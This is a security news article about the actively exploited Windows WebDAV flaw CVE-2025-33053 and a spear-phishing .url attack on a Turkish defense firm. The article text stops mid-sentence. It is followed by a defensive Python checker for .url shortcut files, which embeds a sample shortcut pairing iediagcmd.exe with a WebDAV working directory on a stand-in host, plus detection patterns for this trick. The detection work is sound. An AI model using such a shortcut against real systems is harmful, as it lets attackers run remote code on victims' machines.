Microsoft Windows WebDAV 0-Day RCE Vulnerability Actively Exploited in The Wild
gbhackers
A critical zero-day vulnerability in Microsoft Windows, designated CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon.
The flaw, which enables remote code execution (RCE) through manipulation of a system’s working directory, was addressed by Microsoft in its June 2025 Patch Tuesday updates following responsible disclosure by Check Point Research (CPR). Below is a technical breakdown of the attack and its implications.
Discovery and Exploitation of CVE-2025-33053
In March 2025, CPR identified an attempted cyberattack targeting a Turkish defense company.
The attack leveraged a malicious .url file, likely delivered via spear-phishing emails, to exploit CVE-2025-33053.
This vulnerability allows attackers to manipulate the working directory of legitimate Windows tools, such as iediagcmd.exe, to execute malicious files hosted on an attacker-controlled WebDAV server.
The .url file, named TLM.005_TELESKOPIK_MAST_HASAR_BILDIRIM_RAPORU.pdf.url, redirected the execution of iediagcmd.exe to a malicious route.exe on a ...
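A defender-side check for the pattern described above, added here as an example and not taken from the original article or from CPR: it parses .url (Internet Shortcut) files and flags a local executable target combined with a remote or WebDAV working directory. The sample shortcut contents, the host name webdav.example and the function name audit_url_shortcut are constructed for illustration.

```python
import configparser
import re

# Working directory that lives on a remote share (UNC or URL form).
REMOTE_PATH = re.compile(r"^(\\\\|//|https?://)", re.I)
# Markers of the Windows WebDAV UNC form, e.g. \\host@SSL@443\DavWWWRoot\...
WEBDAV_HINT = re.compile(r"@ssl|@\d{2,5}|davwwwroot", re.I)
# Shortcut target that is a local program rather than a web address.
LOCAL_EXE = re.compile(r"^(file:///)?[a-z]:[\\/].*\.(exe|com|bat|cmd)$", re.I)
# Document-looking name hiding the real .url extension.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|txt|jpe?g|png)\.url$", re.I)

# Constructed samples (not taken from the real attack).
SAMPLE_SUSPICIOUS = r"""[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\webdav.example@SSL@443\DavWWWRoot\share
"""
SAMPLE_BENIGN = "[InternetShortcut]\nURL=https://example.com/\n"


def audit_url_shortcut(filename: str, text: str) -> list[str]:
    """Return findings for one .url file; an empty list means nothing flagged."""
    findings = []
    if DOUBLE_EXT.search(filename):
        findings.append("double-extension")
    # Only '=' is a delimiter so that 'C:\...' values are not split on ':'.
    parser = configparser.ConfigParser(
        interpolation=None, strict=False, delimiters=("=",))
    try:
        parser.read_string(text)
    except configparser.Error:
        return findings + ["unparseable"]
    # Section names are case-sensitive in configparser; match loosely.
    name = next((s for s in parser.sections()
                 if s.lower() == "internetshortcut"), None)
    if name is None:
        return findings
    shortcut = parser[name]  # option keys are lower-cased by default
    target = shortcut.get("url", "").strip()
    workdir = shortcut.get("workingdirectory", "").strip()
    if LOCAL_EXE.match(target):
        findings.append("local-executable-target")
    if REMOTE_PATH.match(workdir):
        findings.append("remote-working-directory")
        if WEBDAV_HINT.search(workdir):
            findings.append("webdav-working-directory")
    return findings


if __name__ == "__main__":
    print(audit_url_shortcut("REPORT.pdf.url", SAMPLE_SUSPICIOUS))
```

A shortcut that combines a local executable target with a remote working directory is the combination worth alerting on; either finding alone can occur in legitimate shortcuts.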